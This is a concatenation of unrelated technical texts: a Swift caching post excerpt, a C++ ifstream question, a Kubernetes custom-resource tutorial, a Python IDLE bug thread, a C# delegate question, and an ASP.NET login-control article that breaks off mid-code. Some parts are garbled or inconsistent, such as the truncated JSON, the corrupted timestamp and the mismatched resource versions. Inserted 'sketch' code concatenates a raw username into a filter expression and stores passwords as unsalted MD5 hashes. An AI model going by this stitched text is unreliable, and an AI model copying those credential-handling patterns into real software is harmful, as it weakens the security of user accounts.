So far I’ve only really discussed immutable relationships and read-only data. The app where we’re using this pattern has entirely immutable data in its flat cache. All the data comes down in one giant blob of JSON, and then the flat cache is fully hydrated. We never write back up to the server, and all user-generated data is stored locally on the device. If you want the same pattern to work with mutable data, a few things change, depending on whether your model objects are classes or structs. If they’re classes, they’ll need to be thread-safe, since each instance will be shared across the whole app. If they’re classes, mutating any one reference to an entity will mutate them all, since they’re all the same instance. If they’re structs, your flat cache will need to be thread-safe. The Sourcery template will have to synthesize a setter as well as a getter. In addition, anything long-lived (like a VC) that relies on the data being updated regularly should draw its value directly from the flat cache.

final class PostVC {

    var postID: String

    init(postID: String) {
        self.postID = postID
    }

    var post: Post? {
        get {
            return cache.get(id: postID)
        }
        set {
            guard let newValue = newValue else { return }
            cache.set(value: newValue)
        }
    }
}

To make this even better, we can pull a page from Chris Eidhof’s most recent blog post about struct references, and roll this into a type.

class Cached<T: Cachable> {

    var cache = FlatCache.shared

    let id: String

    init(id: String) {
        self.id = id
    }

    var value: T? {
        get {
            return cache.get(id: id)
        }
        set {
            guard let newValue = newValue else { return }
            cache.set(value: newValue)
        }
    }
}

And in your VC, the post property would be replaced with something like:

lazy var cachedPost = Cached<Post>(id: postID)

Lastly, if your system has mutations, you need a way to inform objects when a mutation occurs. NSNotificationCenter could be a good system for this, or some kind of reactive implementation where you filter out irrelevant notifications and subscribe only to the ones you care about (a specific post with a given post ID, for example).

Singletons and Testing

This pattern relies on a singleton to fetch the relationships. This has a chance of hampering testability. There are a few different options for handling this, including injecting the flat cache into the various objects that use it, and having the flat cache be a weak var property on each model object instead of a static let. At that point, any flat cache would be responsible for ensuring the integrity of its child objects’ references to the flat cache. This is definitely added complexity, and it’s a tradeoff that comes along with this pattern.

References and other systems

- Redux recommends a pattern similar to this. They have a post describing how to structure your data, called Normalizing State Shape. They discuss it a bit in this post as well.
Well ... first please see this example using C++ ifstream:

#include <iostream>
#include <fstream>
using namespace std;

int main(int argc, char** argv)
{
    if (argc != 2)
    {
        cout << "Please give a file name." << endl;
        return 1;
    }
    ifstream in(argv[1]);
    if (in)
    {
        cout << "Success!" << endl;
        in.close();
    }
    if (!in)
    {
        cout << "Failure!" << endl;
        return 2;
    }
    return 0;
}

My question is: how does the ifstream object behave like a bool value in the above code? I want to write my own class, and I wish its objects would behave in the same way. Can you please tell me how I can write such a class?
http://cboard.cprogramming.com/cplusplus-programming/98009-object-bool-context.html
In the first two installments of this series we reviewed the general flow in the API server and how state is managed using etcd. Now we're moving on to the topic of how to extend the core API.

Initially, the only way to extend the API server was to fork and patch the kube-apiserver source code and integrate your own resources. Alternatively, one could try to lobby to get the new types upstream into the core set of objects. This, however, leads to an issue: the core API would grow over time, leading to a potentially bloated API. Rather than letting the core get too unwieldy, the project came up with two ways to extend it:

- Using Custom Resource Definitions (CRDs), which were formerly called Third Party Resources (TPRs). With CRDs you have a simple yet flexible way to define your own object kinds and let the API server handle the entire lifecycle.
- Using User API Servers (UAS) that run in parallel to the main API server. These are more involved in terms of development and require you to invest more up-front; however, they give you much more fine-grained control over what is going on with the objects.

Also, in the context of extensions, we will discuss the object lifecycle (from initialization to admission to finalizers). We'll cover the topic of CRDs in two posts, as it is rather elaborate and we're dealing with a few moving targets in the 1.7 to 1.8 transition. In this post we focus on CRDs, and in the second part we will show you how to write a custom controller for them, including code generation with kube-gen.

Declaration and Creation of CRDs

As we discussed in part 1, resources are grouped by API groups and have corresponding HTTP paths per version. Now, if you were to implement a CRD, the first task is to name a new API group that does not overlap with an existing core group. Inside your own API group you can have as many resources as you like, and they can have the same names as resources in other groups.
Let's have a look at a concrete example. We differentiate between the CRD, which is like a class definition in object-oriented programming, and the actual custom resource (CR), which you can view as a sort of instance. First we have a look at the class-level definition:

apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: databases.example.com
spec:
  group: example.com
  version: v1
  names:
    kind: Database
    plural: databases
  scope: Namespaced

In line 1 above you see the CRD apiVersion you must use; every kube-apiserver 1.7 and higher supports this. In line 5 and below you use the spec fields to define:

- In line 6: the CRD API group (a good practice is to use a fully qualified domain name of your organization; example.com in our case).
- In line 7: the version of your CRD object. There is only one version per resource, but there can be multiple resources with different versions in your API group.

The spec.names field has two mandatory children:

- In line 9: the kind, which is the upper-case singular by convention (Database).
- In line 10: the plural, which is the lowercase plural by convention (databases here).

You define the resource/HTTP path using the interestingly named field plural, which leads in our example to https://<server>/apis/example.com/v1/namespaces/default/databases. There is also the optional singular field, which defaults to the lowercase kind value and can be used in the context of kubectl. In addition, spec.names has a number of optional fields which are derived and filled in automatically by the API server.

Remember from part 1 that the kind describes the type of the object, while the resource corresponds to the HTTP path. Most of the time those two match; but in certain situations the API server might return a different kind on the same API HTTP path (example: Status error objects, which are another kind, obviously). Note that the resource name (databases in our example) combined with the group (example.com) must match the metadata name field (see line 4, above).
Now we're in a position to actually create the CRD based on the above YAML spec:

$ kubectl create -f databases-crd.yaml
customresourcedefinition "databases.example.com" created

Note that this creation process is an asynchronous one, meaning you have to check the CRD status to confirm that the specified names are accepted (that is, there are no name conflicts with other resources) and that the API server has established the API handlers to serve the new resource. In a script or in code, polling is a good way to wait for this to happen. Eventually, we get this:

$ kubectl get crd databases.example.com -o yaml
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  creationTimestamp: 2017-08-09T09:21:43Z
  name: databases.example.com
  resourceVersion: "792"
  selfLink: /apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/databases.example.com
  uid: 28c94a05-7ce4-11e7-888c-42010a9a0fd5
spec:
  group: example.com
  names:
    kind: Database
    listKind: DatabaseList
    plural: databases
    singular: database
  scope: Namespaced
  version: v1
status:
  acceptedNames:
    kind: Database
    listKind: DatabaseList
    plural: databases
    singular: database
  conditions:
  - lastTransitionTime: null
    message: no conflicts found
    reason: NoConflicts
    status: "True"
    type: NamesAccepted
  - lastTransitionTime: 2017-08-09T09:21:43Z
    message: the initial names have been accepted
    reason: InitialNamesAccepted
    status: "True"
    type: Established

Above, you can see that kubectl has picked up the CRD we defined earlier and is able to provide status information about it: all names are accepted without a conflict, and the CRD is established, that is, the API server serves it now.
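As a concrete illustration of the polling just mentioned, here is a small hypothetical helper in Python. The function names, and the choice to shell out to kubectl get crd ... -o json, are my own for this sketch and not from the post; it simply waits until the CRD status reports the Established condition shown above:

```python
import json
import subprocess
import time


def is_established(crd):
    """Return True if the CRD's status reports Established=True."""
    conditions = crd.get("status", {}).get("conditions", [])
    return any(c.get("type") == "Established" and c.get("status") == "True"
               for c in conditions)


def wait_for_crd(name, timeout=30):
    """Poll `kubectl get crd <name> -o json` until the CRD is established."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        out = subprocess.check_output(
            ["kubectl", "get", "crd", name, "-o", "json"])
        if is_established(json.loads(out)):
            return True
        time.sleep(1)
    return False
```

A script would call wait_for_crd("databases.example.com") right after kubectl create before attempting to create any instances of the new resource.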
Discovering and Using CRDs

After proxying the Kubernetes API locally using kubectl proxy, we can discover the database CRD we defined in the previous step like so:

$ http 127.0.0.1:8001/apis/example.com
HTTP/1.1 200 OK
Content-Length: 223
Content-Type: application/json
Date: Wed, 09 Aug 2017 09:25:44 GMT

{
    "apiVersion": "v1",
    "kind": "APIGroup",
    "name": "example.com",
    "preferredVersion": {
        "groupVersion": "example.com/v1",
        "version": "v1"
    },
    "serverAddressByClientCIDRs": null,
    "versions": [
        {
            "groupVersion": "example.com/v1",
            "version": "v1"
        }
    ]
}

Note that kubectl caches discovery content by default for 10 minutes, using the ~/.kube/cache/discovery directory. Also, it can take up to 10 minutes for kubectl to see a new resource, such as the CRD we defined above. However, on a cache miss—that is, when kubectl can not identify the resource name in a command—it will immediately re-discover it.

Next, we want to create an instance of the CRD:

$ cat wordpress-database.yaml
apiVersion: example.com/v1
kind: Database
metadata:
  name: wordpress
spec:
  user: wp
  password: secret
  encoding: unicode

$ kubectl create -f wordpress-database.yaml
database "wordpress" created

$ kubectl get databases.example.com
NAME        KIND
wordpress   Database.v1.example.com

To monitor the resource creation and updates directly via the API, you can use a watch on a certain resourceVersion (as discussed in part 2).
First, we'll discover the resourceVersion of the database CR we created, and then use curl to watch changes to the resource in a separate shell session:

$ http 127.0.0.1:8001/apis/example.com/v1/namespaces/default/databases
HTTP/1.1 200 OK
Content-Length: 593
Content-Type: application/json
Date: Wed, 09 Aug 2017 09:38:49 GMT

{
    "apiVersion": "example.com/v1",
    "items": [
        {
            "apiVersion": "example.com/v1",
            "kind": "Database",
            "metadata": {
                "clusterName": "",
                "creationTimestamp": "2017-08-09T09"
            }
        }
    ],
    "kind": "DatabaseList",
    "metadata": {
        "resourceVersion": "2179",
        "selfLink": "/apis/example.com/v1/namespaces/default/databases"
    }
}

So here we find that our CR /apis/example.com/v1/namespaces/default/databases/wordpress is in fact at "resourceVersion": "2154" currently, and this is what we will use for the watch with curl:

$ curl -f "127.0.0.1:8001/apis/example.com/v1/namespaces/default/databases?watch=true&resourceVersion=2154"

Now we open a new shell session and delete the wordpress resource; we can then see the notification from the watch in the original session:

$ kubectl delete databases.example.com/wordpress

Note: We could have also used kubectl delete database wordpress, because there is no pre-defined database resource in Kubernetes. Moreover, the singular word database is the spec.names.singular field in our CRD, automatically derived following English grammar.

In the original session—where you launched the curl watch command—you can now see a live update from the API server:

{"type":"DELETED","object":{"apiVersion":"example.com/v1","kind":"Database","metadata":{"clusterName":"","creationTimestamp":"2017-0[0/515] "}}}

Taken together, using three shell sessions (an additional one for the initial kube proxy command at the bottom), the above commands and respective outputs look as follows:

Finally, let's have a look at how the respective data of the database CRD is stored in etcd.
In the following we're accessing etcd, on the master node, directly via its HTTP API:

$ curl -s localhost:2379/v2/keys/registry/example.com/databases/default | jq .
{
  "action": "get",
  "node": {
    "key": "/registry/example.com/databases/default",
    "dir": true,
    "nodes": [
      {
        "key": "/registry/example.com/databases/default/wordpress",
        "value": "{\"apiVersion\":\"example.com/v1\",\"kind\":\"Database\",\"metadata\":{\"clusterName\":\"\",\"creationTimestamp\":\"2017-08-09T14:53:40Z\",\"deletionGracePeriodSeconds\":null,\"deletionTimestamp\":null,\"name\":\"wordpress\",\"namespace\":\"default\",\"selfLink\":\"\",\"uid\":\"8837f788-7d12-11e7-9d28-080027390640\"},\"spec\":{\"encoding\":\"unicode\",\"password\":\"secret\",\"user\":\"wp\"}}\n",
        "modifiedIndex": 670,
        "createdIndex": 670
      }
    ],
    "modifiedIndex": 670,
    "createdIndex": 670
  }
}

As you can see from the etcd resource dump above, the CRD data is essentially an uninterpreted blob. Note that when deleting the CRD, all instances will be deleted as well, that is, it is a cascading delete operation.

Current State, Limitations, and Future of CRDs

At the moment, we have Kubernetes 1.7 as the stable release version and are expecting 1.8 to land by the beginning of October 2017. In this context, the state of CRDs is as follows:

- CRDs started to replace ThirdPartyResources (TPRs) in Kubernetes 1.7, and TPRs will be removed for good in Kubernetes 1.8.
- A simple migration path from TPRs to CRDs exists.
- A single version per CRD is supported; however, multiple versions per group are possible.
- CRDs present a consistent API and are basically indistinguishable from native resources from the user's point of view.
- CRDs are a stable basis for more features coming in the following versions, for example:
  - Validation with JSON Schema; you can check out the CRD validation proposal.
  - Garbage collection in 1.8.

Now that you've seen how to use CRDs, let's discuss their limitations:

- They do not provide the capability for version conversion; that is, only one version is possible per CRD (conversion support is not expected near- or mid-term).
- There is no validation currently, though it might land in 1.8 (see this Google Summer of Code project), and validation expressiveness with the upcoming JSON Schema support is limited (not Turing complete).
- No fast, in-process admission is possible (but initializers and admission webhooks are supported).
- You can not define sub-resources, for example scale or status; however, there's a proposal for it on the way.
- Last but not least, CRDs currently do not support defaulting, that is, assigning default values to certain fields (this might come in one of the following versions).

In order to address the above issues and have a more flexible way to extend Kubernetes, you can use User API Servers (UAS), running in parallel to the main API server. We will go into detail on writing UASs in one of the next installments of this blog post series. Next time around we will complete the CRD by writing a custom controller for it.
https://www.openshift.com/blog/kubernetes-deep-dive-api-server-part-3a
Created on 2019-11-29 21:14 by JohnnyNajera, last changed 2019-12-10 01:17 by terry.reedy. This issue is now closed.

In Ubuntu 19.10, and probably earlier versions of Ubuntu, the autocomplete window doesn't show up when expected. This is probably due to wm_geometry being called in a context in which it has no effect.

IDLE completes global names, attributes, and file names with various invocation methods. The main problem users have in editor windows is not running the module to update namespaces. But the claim here (and in the PR) is that there is a timing problem. JN, please post at least one minimal, specific, sometimes-reproducible example, with code and user actions, that misbehaves. Do you have any idea why a 1 millisecond delay helps? (3.5 and 3.6 only get security fixes.)

At least this scenario:
- Ubuntu 19.10
- Open the interpreter
- Literally nothing makes the autocomplete window show up.

As mentioned in the PR, it's not about the 1 ms but about being called outside of the event itself. This can also be fixed by immediately calling `update_idletasks`, but more about this in the PR. Thanks, have a nice day.

New changeset bbc4162bafe018f07bab0b624b37974cc33daad9 by Terry Jan Reedy (JohnnyNajera) in branch 'master': bpo-38943: Fix IDLE autocomplete window not always appearing (GH-17416)

New changeset 1b0e88dde146eb290735f4b486d4a67074132100 by Miss Islington (bot) in branch '3.7': bpo-38943: Fix IDLE autocomplete window not always appearing (GH-17416)

New changeset 34d5d5e096ee804e94199bf242469cdf9bbc3316 by Miss Islington (bot) in branch '3.8': bpo-38943: Fix IDLE autocomplete window not always appearing (GH-17416)
https://bugs.python.org/issue38943
Sharad Shivmath

What am I doing wrong here?

I'm getting an error: "Did you return the result of 'number * number' in your anonymous method delegate? Restart?"

using System;

namespace Treehouse.CodeChallenges
{
    public class Program
    {
        public Func<int, int> Square = delegate (int number)
        {
            int result = number * number;
            return result;
        };
    }
}

1 Answer

Steven Parker

Apparently, when they say "returns the result of number * number" they mean it quite literally: the challenge seems to only allow the calculation to be returned directly (`return number * number;`) instead of assigning it to an intermediate variable and returning that. In actual practice your solution would work exactly the same, but it doesn't pass the challenge. You may want to report this as a bug to the Support staff.
https://teamtreehouse.com/community/what-am-i-doing-wrong-here-78
G. Andrew Duthie
Graymad Enterprises, Inc.

January 2004

Applies to: Microsoft® ASP.NET

Summary: One anticipated feature in the upcoming version of ASP.NET, code name ASP.NET "Whidbey" (after the code name for the upcoming release of Visual Studio .NET), is the addition of controls to assist in registering and authenticating users. This article shows how you can create a control to add this functionality to ASP.NET 1.1. (21 printed pages)

Download RegLoginControlSample.msi.

Contents
Introduction
Control Overview
Creating the Basic Control
Building the UI
Handling Postbacks
Verifying and Saving Credentials
Configuring Forms Authentication and Authorization
Using the RegLogin Control
Bonus Control: LoginStatus
Summary

Introduction

Unless you have been living on a desert island somewhere, if you are a Microsoft® ASP.NET developer, you have probably heard of a little thing called Whidbey (see ASP.NET "Whidbey" and ASP.NET Whidbey). Whidbey was announced to great fanfare at the 2003 Professional Developer's Conference in Los Angeles, and offers a host of new features that simplify development and reduce the amount of code .NET developers need to write. One of the features that is surely going to excite ASP.NET developers is the inclusion of a set of server controls that encapsulate much of the code required for registering and authenticating users (Michele Leroux Bustamante writes about these controls in her article, Securing ASP.NET Applications - With Less Code). These controls reduce, and in some cases eliminate, the code you need to write to perform common authentication tasks.

"That sounds great," you say, "but Whidbey isn't out yet. What do I do now?" The answer to that question is that you can, with a little help from this article, write your own registration and login control to encapsulate the code used for these tasks, and provide simplified development and reuse across your applications.
In this article, I will demonstrate how you can create a single control that provides both user registration and authentication using ASP.NET Forms Authentication. For simplicity's sake, this example uses an XML file as the credential store for the control. The control, however, can be easily modified to authenticate credentials against a database or other back-end data store (for example, in order to avoid storing credentials within the web space of the application).

Control Overview

The control consists of two separate sets of UI elements: one for logins, and one for registrations, shown in Figures 1 and 2. The control determines which UI to display on the basis of an internal variable, _mode, and defaults to displaying the login UI.

Figure 1. The RegLogin control in Login mode

Figure 2. The RegLogin control in Register mode

In addition to displaying the UI elements, the control exposes one public, read-only property called StatusMessage, which is used to communicate information about the success or failure of the login or registration to the consuming page. This allows the developer using the control to choose how and where this information is displayed to the end user. The control also exposes one public method, CreateBlankUsersFile, which can be used to create the XML file used to store credentials for the control. The RegLogin control will automatically call this method internally if it determines at runtime that the file does not exist.

Tip: Since write access is required on the folder where the XML file is created (for this control, the application root), you may want to call CreateBlankUsersFile from a utility page running with administrative credentials using Impersonation to get the file created. Once the file is created, you can assign read/write permissions on the file to the ASPNET user account, which will allow the control to add new credentials when necessary.
Creating the Basic Control

The first step in creating the RegLogin control is to create a new project, using the Web Control Library template, as shown in Figure 3.

Figure 3. The Web Control Library template

As thoughtful as it is of Microsoft Visual Studio® to add a template control class for you, I usually end up adding one with the name I want (in my project, RegLogin) and deleting the default class. This is simpler than renaming the default class (which requires that you rename both the class and the file; otherwise your naming can get a little hard to track and maintain). So delete the WebCustomControl1.vb class, and add a new class using the Web Custom Control template, as shown in Figure 4.

Figure 4. The Web Custom Control template

Building the UI

There are a couple of different ways to build a UI in ASP.NET server controls. The simpler technique, which I will demonstrate with this control, is rendering the output directly from the control. A more complicated, but in some cases more powerful, technique is to use composition, in which the UI for a custom server control is built up from a number of pre-existing server controls, each of which is responsible for rendering its own portion of the control's UI. To stay focused, we will leave further discussion of composite controls to other articles (such as MSDN® Magazine's Advanced ASP.NET Server-side Controls and the .NET Framework Developer's Guide documentation on Developing a Composite Control) and focus on rendering. The Web Custom Control template is designed for creating a rendered control.
Here is a look at the template's code (I have removed the attributes to make the code more readable):

Imports System.ComponentModel
Imports System.Web.UI

Public Class WebCustomControl1
    Inherits System.Web.UI.WebControls.WebControl

    Dim _text As String

    Property [Text]() As String
        Get
            Return _text
        End Get
        Set(ByVal Value As String)
            _text = Value
        End Set
    End Property

    Protected Overrides Sub Render(ByVal output As _
            System.Web.UI.HtmlTextWriter)
        output.Write([Text])
    End Sub
End Class

The template includes a couple of useful Imports statements, and contains a class that inherits from the WebControl base class, has a single property (Text), and overrides the Render method of its base class in order to render its output—in this case just the contents of the Text property.

Note: Because Text is a commonly used member name in the .NET Framework, the property name is encased in square brackets, which tells the Microsoft Visual Basic® compiler to use the local version of Text, rather than the one in any referenced assemblies. Alternatively, you could precede the property name with the full namespace of this control. A more common use of square brackets in Visual Basic is to allow the use of member names that are the same as restricted keywords, particularly for legacy code. While surrounding a member name such as Loop with square brackets will allow you to use that name, it is highly recommended that you avoid the use of restricted keywords for class or member names, which can make your code more error-prone and difficult to maintain.

The default base class in the Web Custom Control template is System.Web.UI.WebControls.WebControl. While this is a reasonably good starting point for many controls, in order to avoid unnecessary complexity and confusion, it is best to inherit from the simplest base class that provides all the functionality you need.
Since we want to keep our login control relatively simple, we will change the base class for the control from System.Web.UI.WebControls.WebControl to System.Web.UI.Control, which is the base class from which all ASP.NET server controls ultimately inherit:

Public Class RegLogin
    Inherits System.Web.UI.Control

For rendered controls, you will override the Render method of the control's base class to render your custom output. Note that if you inherit from a richer control, such as the TextBox or DropDownList controls, you will also want to call the Render method of the base class at some point, in order to render the output of the base class. Because the Control class has no UI of its own, there is no need to do that for our control.

One thing to remember is that you do not need to have all of your rendering logic directly within the Render method. For our RegLogin control, we will actually just use the Render method to execute a Select Case statement, and call a separate method, depending on the outcome, to render the appropriate output (registration UI or login UI) for our control:

Protected Overrides Sub Render(ByVal output As _
        System.Web.UI.HtmlTextWriter)
    Select Case _mode
        Case RegLoginMode.Register
            DisplayRegUI(output)
        Case RegLoginMode.Login
            DisplayLoginUI(output)
    End Select
End Sub

The Select Case statement evaluates the private member variable _mode, which uses an enumeration for its type, and defaults to RegLoginMode.Login:

Dim _mode As RegLoginMode = RegLoginMode.Login

The enumeration definition (which resides within the same file, but outside the class declaration) is shown below:

Public Enum RegLoginMode
    Login
    Register
End Enum

Once we have figured out which mode we are in, we call either DisplayRegUI or DisplayLoginUI, in each case passing the HtmlTextWriter instance, output, that is passed to the Render method. DisplayRegUI and DisplayLoginUI illustrate two different techniques for building up the output to be rendered to the browser.
DisplayRegUI uses the StringBuilder class to assemble a string containing the output to be rendered, writing all of the output at once at the end of the method, and uses standard HTML tags for the output (along with Visual Basic constants such as vbTab for adding whitespace). DisplayLoginUI uses methods of the HtmlTextWriter instance passed to the procedure, as well as static properties of the HtmlTextWriter class, to assemble and format the output. Using this technique, the output is rendered little by little, with each call to Write or WriteLine.

Both rendering methods take advantage of some helpful members of the Control and Page classes to facilitate postbacks for the control. The call to Me.UniqueID returns the name of the control, including any naming containers for that control (in our case, it returns just the name of the RegLogin control):

Writer.WriteAttribute("name", Me.UniqueID)

Both DisplayRegUI and DisplayLoginUI also call Page.GetPostBackEventReference in order to set up the JavaScript necessary to post back the control with the appropriate parameters (control name, etc.). Note that the use of client-side script does mean that this control will not work properly if the user has turned off JavaScript in their browser:

Writer.WriteAttribute("OnClick", "javascript:" & _
    Page.GetPostBackEventReference(Me, "Login"))

One important difference between DisplayLoginUI and DisplayRegUI is that while DisplayRegUI only provides for posting back the contents of its form fields by clicking a button, DisplayLoginUI also may display a link that causes the control to switch to registration mode, based on the _displayRegLink internal member variable. _displayRegLink is a Boolean that is set to True when a user attempts to log in but the provided username is not found, as we will see later in this article.
Another notable difference between DisplayLoginUI and DisplayRegUI is that DisplayLoginUI renders two textboxes, one each for username and password, while DisplayRegUI adds a third textbox for password confirmation. We will see why this is important in the next section.

A final note on the rendering of the RegLogin control: the code used to render the registration and login UI for this control could be greatly simplified by rendering only the UI elements themselves, rather than the HTML table elements used to align the elements neatly, but that would also result in a rather unsightly control. This highlights a common trade-off in control development: more functionality, flexibility, or improved appearance often comes at the cost of additional code or complexity, something you should keep in mind when designing your own controls.

Handling Postbacks

To handle the postbacks that our control will generate at runtime, we will need to add an Implements keyword to the class declaration referencing the IPostBackDataHandler and IPostBackEventHandler interfaces:

Public Class RegLogin
    Inherits System.Web.UI.Control
    Implements IPostBackDataHandler, IPostBackEventHandler

IPostBackDataHandler defines two methods, LoadPostData and RaisePostDataChangedEvent, which are used for loading the data submitted with a postback and responding to changes in data between postbacks, respectively.

Note: RaisePostDataChangedEvent will only be called by the runtime if LoadPostData, which returns a Boolean, returns True. This means that if you care about changes in data between one postback and a subsequent postback, you should store the data.

IPostBackEventHandler defines a single method, RaisePostBackEvent, which is used for determining whether an event should be raised as the result of a given postback, and raising the event, if necessary. Implementing the interfaces requires that we add the methods defined in the interfaces.
The good news is that this is fairly easy to do, even if you do not already know the exact method signature (method name, arguments, and return type) to use. Once you have added the desired interface(s), you can simply select an interface from the Class Name dropdown in the Visual Basic code editor, and then select the desired method name from the Method Name dropdown, as shown in Figure 5. Members for which an implementation exists in the current class are shown in boldface. You can also use this technique to add event handlers for controls that are used in your classes, as well as other method implementations.

Figure 5. Adding an implementation for a method defined by an interface

In the RegLogin control, we need to handle three postback possibilities:

- A postback caused by the button in the login UI
- A postback caused by the "Register" link in the login UI (to switch to register mode)
- A postback caused by the button in the registration UI

We handle all of these possibilities by examining the contents of the __EVENTARGUMENT form field passed with the postback, and taking the appropriate action:

Public Function LoadPostData(ByVal postDataKey As String, _
        ByVal postCollection As _
        System.Collections.Specialized.NameValueCollection) _
        As Boolean _
        Implements System.Web.UI.IPostBackDataHandler.LoadPostData

    Dim newValues As String() = Split(postCollection(postDataKey), ",")
    Dim Result As Boolean = False

    Select Case Page.Request.Form("__EVENTARGUMENT")
        Case "DisplayRegUI"
            _mode = RegLoginMode.Register
        Case "Login"
            Result = LoadLoginPostData(newValues)
        Case "Register"
            _mode = RegLoginMode.Register
            Result = LoadRegisterPostData(newValues)
    End Select

    Return Result
End Function

The __EVENTARGUMENT form field is set by the second parameter passed to the call to Page.GetPostBackEventReference in the DisplayLoginUI and DisplayRegUI methods. Note that if the value of __EVENTARGUMENT is either "DisplayRegUI" or "Register", we set the _mode member variable to RegLoginMode.Register, which causes the registration UI to be rendered. Since _mode defaults to RegLoginMode.Login, we do not need to explicitly set the login mode when the value of __EVENTARGUMENT is "Login".
We only need to process postback data in the "Login" and "Register" cases, so in these cases we also call another method (either LoadLoginPostData or LoadRegisterPostData) to load the postback data into the appropriate member variables for further processing. Note that we split the collection passed into LoadPostData into a string array called newValues that we then pass into the method in which we will actually load the postback data. Also note that both LoadLoginPostData and LoadRegisterPostData return a Boolean, and their return value determines what is returned from LoadPostData (which determines whether RaisePostDataChangedEvent is called).

In LoadLoginPostData, we pull the username into a local variable, pull the password into the _password member variable, and then compare the local username variable to the _userName member variable to see if the username has changed since the last postback. If it has, we assign the new value to _userName, and return True to indicate that RaisePostDataChangedEvent should be called. In our case, we do not actually do anything useful in RaisePostDataChangedEvent, but this example shows how it operates.

Note: We are able to compare the value of the member variable _userName to the new value passed in because we save the value of _userName and restore it with each postback, by overriding the SaveViewState and LoadViewState methods of the Control base class:

Protected Overrides Sub LoadViewState(ByVal savedState As Object)
    If Not savedState Is Nothing Then
        _userName = CStr(savedState)
    End If
End Sub

Protected Overrides Function SaveViewState() As Object
    Return _userName
End Function

In LoadRegisterPostData, we pull the username, password, and password confirm values from the postback into the appropriate member variables, and return False. We return False because we would not expect the user to change their username when re-submitting the registration information.
Of course, it is possible they might, so this is a place where you might want to add some logic to check for this and take appropriate action. I have left this out to keep things simple. Once we have loaded the data from the postback into the appropriate local variables, we will need to either retrieve and verify the credentials against those stored in our XML file (in the case of a postback from the login UI), or save the new username and password (in the case of a postback from the registration UI). We will discuss these in the next section.

Verifying and Saving Credentials

The starting point for verifying and saving credentials is the RaisePostBackEvent method, which is called automatically by the runtime on the control that causes a postback, assuming it implements IPostBackEventHandler. When using JavaScript to post back the page, as in the case of the "Register" link, the eventArgument parameter passed to RaisePostBackEvent by the runtime contains the name of the argument parameter passed to Page.GetPostBackEventReference, which allows us to determine if it was the "Register" link that caused the postback.

Since one of the purposes of RaisePostBackEvent is to raise events to the page that contains the control, we will need to define the events we intend to raise from our control, which we do with the following event declarations:

'Event declarations
Public Event AuthSuccess As EventHandler
Public Event AuthFailure As EventHandler
Public Event RegSuccess As EventHandler
Public Event RegFailure As EventHandler

Once the events have been declared, we can raise them using the RaiseEvent keyword, as we will see shortly.

In RaisePostBackEvent, we first examine the _mode member variable to determine if we are in Register or Login mode. For Register mode, we determine whether the "Register" link caused the postback. If so, we perform no further processing, since the purpose of the postback in this case is simply to switch from displaying the login UI to displaying the registration UI.
If the postback was not the result of the "Register" link being clicked, we attempt to save the provided credentials by calling the SaveCredentials method. The SaveCredentials method creates a new DataSet instance (we do not need to specify the System.Data namespace, in which the DataSet class resides, because this namespace is automatically imported at the project level in all new Visual Basic .NET projects), reads in the current credentials file using the DataSet's ReadXml method, and then attempts to add the credentials passed to it by RaisePostBackEvent as a new row. If successful, it saves the credentials back to the XML file using the DataSet's WriteXml method, and SaveCredentials returns True.

If the username already exists in the credentials file, or the passwords provided do not match, the credentials are not saved and SaveCredentials returns False. We also set the _statusMessage member variable (which is exposed as the public property StatusMessage) to provide a helpful indication of the reason for the failure of registration. The page that consumes the control can use the StatusMessage property to provide this message to the end user. Note that the password is stored as an MD5 hash using the HashPasswordForStoringInConfigFile method of the FormsAuthentication helper class (the Imports System.Web.Security line at the top of RegLogin.vb allows us to call this method without explicitly calling out the namespace).

Note: StatusMessage in this example is exposed as a property to demonstrate the setting and exposing of a property on a custom server control. The downside to this technique is that if the consuming page does not read and display the StatusMessage property, the end user will not know why their registration (or login) failed. For this reason, you might want to render the status message directly from the control if you want to ensure that the message is always displayed.
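Pulling the pieces described above together, SaveCredentials might be sketched like this; the file name, table and column names, and status-message text are assumptions, while the DataSet and hashing calls follow the text:

```vbnet
' Hypothetical sketch. The "username"/"password" column names and the
' Users.xml path are assumptions, not the article's actual code.
Private Function SaveCredentials() As Boolean
    If _password <> _passwordConfirm Then
        _statusMessage = "The passwords provided do not match."
        Return False
    End If
    Dim users As New DataSet
    users.ReadXml(Page.Server.MapPath("Users.xml"))
    Dim credentials As DataTable = users.Tables(0)
    If credentials.Select("username = '" & _userName & "'").Length > 0 Then
        _statusMessage = "That username already exists."
        Return False
    End If
    Dim row As DataRow = credentials.NewRow()
    row("username") = _userName
    ' Store the password as an MD5 hash rather than plain text.
    row("password") = _
        FormsAuthentication.HashPasswordForStoringInConfigFile(_password, "MD5")
    credentials.Rows.Add(row)
    users.WriteXml(Page.Server.MapPath("Users.xml"))
    Return True
End Function
```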
If SaveCredentials returns True, we raise the RegSuccess event and switch the control to login mode; otherwise we raise the RegFailure event and keep the control in register mode (to give the user the opportunity to correct the problem with their registration).

The VerifyCredentials method, which we call from RaisePostBackEvent when we are in login mode, performs similar logic to the SaveCredentials method. It first creates a new DataSet, then attempts to read in the credentials from the credentials file. Since there might not be a credentials file available the first time someone attempts to log in, the attempt is wrapped in a Try...Catch block that catches a FileNotFoundException and calls CreateBlankUsersFile to create the file from scratch (note that if the ASP.NET user does not have write permissions on the root of the application, this call will throw an exception).

If the ReadXml call is successful, we use the Select method exposed by the DataTable class (each DataSet contains one or more DataTable objects) to locate the row, if any, that matches the provided username. If a match is found, we hash the password provided by the user and compare it to the stored hash for that username. If they match, we return True and provide a status message to that effect. If either the username or the password does not match, we return False and set _statusMessage to an appropriate value. In the case of a username mismatch, we also set the _displayRegLink member variable to True, which causes the "Register" link to be rendered, allowing the user to switch to register mode.

As with SaveCredentials, the return value from VerifyCredentials determines the event to be raised. If False, we raise the AuthFailure event. If True, we raise the AuthSuccess event and call the SetAuthCookie method of the FormsAuthentication class to set the authentication cookie that will allow the user to access restricted content.
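Similarly, VerifyCredentials might be sketched as follows; again, the file name, column names, and message text are assumptions based on the description above:

```vbnet
' Hypothetical sketch following the description in the text.
Private Function VerifyCredentials() As Boolean
    Dim users As New DataSet
    Try
        users.ReadXml(Page.Server.MapPath("Users.xml"))
    Catch ex As System.IO.FileNotFoundException
        ' Throws if the ASP.NET user cannot write to the application root.
        CreateBlankUsersFile()
        users.ReadXml(Page.Server.MapPath("Users.xml"))
    End Try
    Dim matches() As DataRow = _
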